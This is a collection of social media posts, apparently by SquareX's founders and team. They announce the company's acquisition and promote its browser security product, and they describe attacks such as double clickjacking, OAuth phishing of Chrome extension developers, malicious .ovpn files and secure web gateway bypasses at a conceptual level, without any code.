Jeswin Mathai

Some great news! Zscaler @zscaler has acquired SquareX @getsquarex this week: lnkd.in/gRsKRQRw As I reflect on this journey, I keep coming back to the pivotal moments that led to the founding of SquareX — and ultimately to where we are today. One moment stands out above all others: our seed investment from @peakxvpartners (previously Sequoia Capital SEA). I’m deeply thankful and grateful to Shailendra @sjs_day1 and the entire Peak XV team for the trust and belief they showed us at such an early stage. I still vividly remember Jeswin Mathai @jeswinMathai and I sitting in their office, walking through live attack demos in the browser — showing how an adversary could escalate from a browser-based foothold to effectively taking control of an entire computer. What stayed with me wasn’t just the diligence or the questions — it was the twinkle in their eyes. The excitement around how fundamental and interesting this problem was, and the shared belief that if we could solve it natively in the browser, in a ubiquitous way, with just an extension, it could meaningfully change the security landscape. I highly recommend Peak XV to any deep-tech founder. They are an extremely long-term, patient, and truly a founder-first investor. Throughout our entire collaboration at SquareX, I always felt they backed us in the decisions we made. That kind of unconditional, unwavering support mattered immensely — especially in a domain that changes as fast as security, where innovation is often driven by what attackers are doing next. That trust gave us the creative flexibility to take bold bets, iterate quickly, and stay focused on solving the right problems. I’d also especially like to acknowledge Anandamoy Roychowdhary @smdcmc , Ying Jie Tan, Rajan Anandan (@RajanAnandan) , and many others at Peak XV who supported SquareX along the way. Thank you all so much — your guidance and belief made a real difference. I’m grateful we were able to build this together, and I’m excited to continue watching Peak XV do amazing investments. Thank you 🙏

Jeswin Mathai is the Chief Architect at @getsquarex, a cybersecurity company focused on protecting users and companies from web-based threats. Jeswin joins the podcast with @GregorVand to talk about browser security today. @jeswinMathai softwareengineeringdaily.com/2025/02/27/bro…

Double Clickjacking is the new attack kid on the block - Here's a good article on Forbes by Davey Winder lnkd.in/gmjvup67 This subverts most existing browser-based protections like X-Frame-Options simply because it's a clever UI redressing attack. Also, the attack's simplicity makes it very easy to orchestrate with existing phishing attacks. This attack further underscores the need for a Browser Detection-Response solution that SquareX is pioneering. Rather than trying to build policies for every new attack - we have the capability to apply zero trust principles to each component and action on a page. A Double Clickjacking attack wins by getting the user to double click and approve a privileged action, e.g., giving consent to a 3rd party app for permissions to your company email/storage. By monitoring every such privileged action by default in the browser, including OAuth, SquareX is able to identify and block a Double Clickjacking attack's attempts. Below is a video of a demo with SquareX! Worried about this attack and other browser-based threats? Set up a demo for your enterprise: sqrx.com

Happy New Year everyone! 2025 is a very interesting number: (a) It is the square of the sum of the first nine numbers: ( 1 +2 +3 +4 +5 +6 +7 +8 +9 )^2 = 45 ^2 = 2025 (b) It is the sum of the first 45 odd numbers: 1 +3 +5 +7 +9 +....+ 87 + 89 = 2025 (c) Its a Harshad/Niven number => divisible by the sum of its digits. For 2025: The sum of its digits is 2+0+2+5 =9 And indeed, 2025÷9 = 225 (d) It is also the product of two perfect squares 2025 = 25 x 81 = 5^2 x 9^2 Most importantly, I hope this is a year great for you and for SquareX! :-)

Really proud moment for the @getsquarex research team - we were the first to discover this attack and publicly disclose and warn Chrome Extension developers. This attack underscores the urgent need for a Browser Detection-Response solution—precisely the innovation SquareX is pioneering. Here is a great article by Forbes on the attack and happy to see us cited: forbes.com/sites/daveywin…. .

The Cyberhaven attack is making headlines—but what could Cyberhaven and its customers have done to prevent it? Attack Context: lnkd.in/gqZCCDYh What Happeend? SquareX reported a large-scale attack targeting Chrome extensions. This is how it worked: - The Chrome Web Store publicly displays the developer’s email address on the extension’s page. - Attackers used that email to impersonate the Chrome Web Store and request urgent action. - By clicking the link in the email, the attackers attempted to gain permission to the developer’s Chrome Extension account. - The developer may have granted access, enabling the attacker to modify and push a malicious update to the extension. Here is video of the acttal attack we uncovered: lnkd.in/gHcqJasK What could have been done to stop this attack? (A) By Cyberhaven: (i) Restricting Risky OAuth Permissions Employees often click through SSO and OAuth screens, potentially granting permissions to unknown third-party apps. On the server side, this could be prevented by disallowing apps that request risky OAuth scopes unless they are authorized. While creating a whitelist isn’t always practical and can reduce productivity, a client-side Browser Detection-Response tool can step in. In the same post linked above, we detail how SquareX could have helped Cyberhaven and other organizations. (ii) Cyberhaven’s browser extension is primarily deployed in enterprise settings, so there is no strong need to host it on the Google Chrome Web Store. Many security extensions (like Cyberhaven) can be deployed via GPO/MDM, hosted on private URLs/stores. This approach removes the risk of a mass compromise like the one seen in this attack. (B) By Enterprises using Browser Extensions (i) Supply Chain Attack Awareness Browser extensions installed from the public Chrome Web Store are vulnerable to supply chain attacks. An extension may be malicious from the start, acquired by a malicious party later, or hijacked. To mitigate these risks, organizations need the ability to detect and block suspicious extensions—either at deployment time or dynamically whenever the extension starts exhibiting malicious behavior. SquareX has extensively researched how extensions can be exploited, including a cutting-edge talk at Defcon and identifying architectural issues in the new MV3 extension framework: Defcon talk: lnkd.in/gdKWmayt Darkreading coverage: lnkd.in/gt7-S29v Our detection capabilities: lnkd.in/gqMTe_tb If you want to learn more about protecting your enterprise, feel free to DM me or try us at sqrx.com SquareX - an industry-first Browser Detection-Response solution.

OMG! We had uncovered and warned about this a week back - the exact attack that Cyberhaven was compromised with and posted about this here: lnkd.in/g8WTmmW8 Such Identity based attacks can be stopped dead in the tracks with SquareX @getsquarex Feel free to DM me if you need more details and want to protect your organization.

QR code attacks are on the rise! These attacks smartly lure enterprise users to use their mobile devices where generally security is low. This is one of those classic attacks which cannot be solved in the cloud via an intercepting proxy as this would require them to analyze every image passing through making it unscalable. This is where a browser-native security product can help - sitting in the browser it can quickly analyze only images in user focus and automatically cloak QR codes! SquareX takes this capability to the next level by also allowing enterprises rules to isolate links on QR codes in Remote Browser Isolation so that users can still do their work but have zero chances of downloading malware. Also inside SquareX's RBI enterprises can still run all their site and content policies to detect attacks. Like what you hear? Take SquareX for spin - sqrx.com

Many enterprise users utilize consumer VPNs, such as OpenVPN. Corporate IT might approve this application because it’s a standard VPN client from a trusted server. However, can an enterprise user be hacked using an OpenVPN script? Many free VPN services provide a simple configuration file (an .ovpn file) that users can just double-click to auto-connect. Interestingly, these .ovpn files can support running arbitrary commands or scripts, allowing an attacker to execute code on a user’s computer. This type of attack is reminiscent of the Midnight Blizzard attack, which uses RDP configuration files to load local drives on remote systems accessible to the attacker. We covered this previously here: x.com/vivekramac/sta… How can your EDR detect this OVPN attack? Unfortunately, it cannot. Most EDRs only offer blanket block/allow settings for file types and do not scan for scripting constructs. What can be done? One way is to prevent the attack “upstream,” in the browser, when the file is downloaded. For example, SquareX can monitor .ovpn files for scripting tokens (such as “Up”) and block these files. Even better, it can copy the file and upload it to the Admin portal for further security analysis. Below is a video demonstration of this attack on a Linux system, although it applies to other platforms as well. More info: sqrx.com

Any interesting examples of cyber security ai agents that folks have built?

Employees have started using SSO as a convenient feature to log in to almost any website that offers a "Login with Microsoft/Google/..." option! Additionally, most SaaS apps provide a "free account to try" option, further encouraging employees to use their company accounts to explore what's behind the curtain. Once an employee logs in, it becomes part of the organization's Shadow SaaS exposure. Often, employees might even use enterprise data to test these unauthorized SaaS apps and then completely forget about them. Even worse, when an employee leaves the company, IT may have no knowledge that enterprise data still exists in those apps. There are several ways to address this issue. A simple approach is to require employees to request an exception when logging into a new SaaS app with their enterprise identity. This ensures IT is aware of why the app is needed and who within the organization is using it. In this video, we demonstrate how this can be implemented via SquareX. Let us know your thoughts, and to test it out, visit sqrx.com

Can a Chrome Extension be taken over from the Chrome Store with just a few clicks? SquareX has uncovered targeted attacks on Chrome Extension developers aimed at taking over the chrome extension from the Chrome store - after this the attacker might try to push a malicious modification to the extension and attack it's users. Btw variants of these attacks have been used in the past to steal cloud data from google drive, one drive etc. So how does this attack work? At it's core this is an identity attack - the attacker creates a fake "Privacy Policy Application" which tries to connect to the developer's account and gain access to his Chrome store account. We show how SquareX's monitoring capabilities is able to detect this Attacker "shadow SaaS" app and how policies can be applied to block this attacks. We've given one example of such a policy but there are many ways our product can help build out attack mitigation for this. It is important to note that as this is an identity attack with entire life cycle in the browser - standard Remote Browser Isolation cannot detect this. For more information check out Identity attack demos: sqrx.com/usecases/ident…

The majority of initial access on an enterprise user's device occurs via the browser — whether through malicious file/script downloads, spearphishing, SSO hijacks, insider threats bypassing DLP, or malicious browser extensions exfiltrating data. The traditional approach is to wait for a file-based attack to drop on the endpoint and hope your EDR detects it, or waitfor an enterprise user's identity to be stolen and then rely on an alert when data exfiltration is flagged by your network security or cloud monitoring controls. These are all reactive rather than proactive measures. Today, the browser is rapidly becoming the primary endpoint, with most user workflows taking place within it. Unlike the browsers of the 2010s, which functioned as simple rendering engines, modern browsers have evolved into application platforms in their own right. This shift makes it feasible to develop browser-native and browser-first security solutions. Chrome and Edge offer basic managed hardening policies to start with, and you can eventually advance to a full-fledged Browser Detection and Response solution like SquareX @getsquarex

What I hate most about enterprise security product websites: No product demo videos and a lack of information on how the product works. Almost always, there is a need to schedule a call with sales, and this slows down the process. I understand the conventional wisdom that competitors might copy you, but honestly, if that's all it takes for competition to kill you, it's time to evaluate your tech. I ran Pentester Academy for over a decade and firmly believe in "show, not tell." We put out hundreds of videos of our courses and even gave out free sample labs. Buyers were able to sample before they bought, making their decision stronger. When I started SquareX, we did the same. Our website has dozens of videos on every aspect of the product. The main page video is a super long 8-minute one, and deliberately so! We are creating a new category—Browser Detection and Response—and most early adopters are astute tech CISOs and teams who love getting into the gory details before buying. We've had so many great calls where we could focus on second-order things rather than unveil what we are really building, as most websites are just full of marketing-sales speak. Incredibly, our social media grew super fast because of this, getting us close to 20K followers on LinkedIn and similar numbers elsewhere. Funny enough, we see others in overlapping market spaces now doing the same, as they see this is working for us. :-) Overall, this makes our industry better, so we are happy to lead the way.

We are looking to hire full time security researchers for SquareX primarily to investigate topics in Browser Security and Client-side Web Attacks. Requirements: published original research at hacker conferences / written security tools / anything else which demonstrates you love security research Worldwide location. Competitive pay. Opportunity to work with a great team which has published some amazing research including: 1. Critical flaws in Webmail attachment scanning: lnkd.in/gvEbRvBy 2. Breaking Secure Web Gateways: lnkd.in/gZsq9nrj 3. Malicious Extensions subverting Mv3: lnkd.in/gt7-S29v Email us your details: founder sqrx.com or DM me.

Our Breaking Secure Web Gateways @defcon talk which uncovered over a dozen architectural vulnerabilities in SASE/SSE SWGs is finally up - all vendors continue to remain vulnerable to these attacks: Test your own SASE/SSE: scan.browser.security and browser.security (live attacks) Talk Video: lnkd.in/gX-ipPW2 SquareX @getsquarex is the industry's first Browser Detection Response solution which detects-mitigates-threathunts client-side web attacks on any browser

so you think your defense posture has you "secure" then you wont mind trying this out to see how easily folks can break into your systems :) @vivekramac @getsquarex

I still remember the time when Gmail introduced its Web 2.0 "rich internet application" - everyone was so impressed that new mails would just appear rather than having to hit "refresh" every few minutes on the web page. We've come a long way - web protocols and applications have become increasingly complex, and the Browser itself has become a complex development platform with millions of lines of code, only second to the operating system itself. We cybersecurity folks know that technology complexity always leads to security implications. The little one understands what's happening under the hood, the more the probability of an adversary lurking around in that darkness. This is exactly what is happening with Web Browsers - very few organizations have visibility into what is happening in this most used enterprise application and even fewer have managed browsers. We started SquareX to solve this exact problem and if you are interested in learning more than setup a call with me: sqrx.com. .

Happy Birthday to our fearless founder @vivekramac 🥳 Here's to another year of breaking barriers, shaking things up, and keeping the browser a safer place for everyone. Thank you for keeping us on our toes, pushing us to the edge of impossible, and making sure we always have a good laugh along the way! Love, The SquareX Team💖 P.S. We totally didn't write Vivek a love poem 😉

Secure Web Gateways (SWG) as part of SASE/SSE unfortunately is becoming dated tech when it comes to detecting client-side Web Attacks happening on an employee's browser. If you are a Pentester/Red Teamer/Security Researcher check out browser.security and test your company/client's SASE/SSE SWG security - all vendors in the Gartner quadrants fail these as they are architectural vulnerabilities. What could be most surprising to most enterprises deploying SASE/SSE is that many important communication channels are not even monitored today e.g. Websockets, WebRTC, WebTransport, gRPC, Server Sent Events, Web Torrent, Firebase Cloud Messaging etc. allowing attackers to fully bypass the monitoring and smuggle malicious files. This is just ONE of the vulnerabilities we discussed in our DEFCON main stage talk! Try SquareX to see how you can protect your enterprise or get us to do a FREE security evaluation for you: sqrx.com @getsquarex